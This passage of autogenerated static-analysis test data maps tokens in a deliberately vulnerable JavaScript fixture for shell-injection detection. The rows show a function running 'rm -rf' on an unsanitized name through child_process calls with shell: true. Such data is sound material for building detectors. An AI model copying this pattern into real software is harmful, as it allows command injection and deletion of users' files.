enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:5:419:16 | execFileSync | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:5:419:16 | execFileSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:18:419:21 | "rm" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:24:419:36 | ["-rf", name] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:25:419:29 | "-rf" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:32:419:35 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:39:419:51 | {shell: true} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:44 | shell | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:44 | shell | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:44 | shell | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:44 | shell | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:44 | shell | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:40:419:50 | shell: true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | InputAccessPathFromCallee | 2.shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | assignedToPropName | shell | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:47:419:50 | true | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp execFile rm -rf name shell true err out cp spawn rm -rf name shell true cp execFileSync rm -rf name shell true cp spawnSync rm -rf name shell true SPAWN_OPT shell true spawn rm first name SPAWN_OPT arr arr push name spawn rm arr SPAWN_OPT spawn rm build node name name : - SPAWN_OPT | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:3 | cp | enclosingFunctionName | shellOption | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:13 | cp.spawnSync | contextFunctionInterfaces | 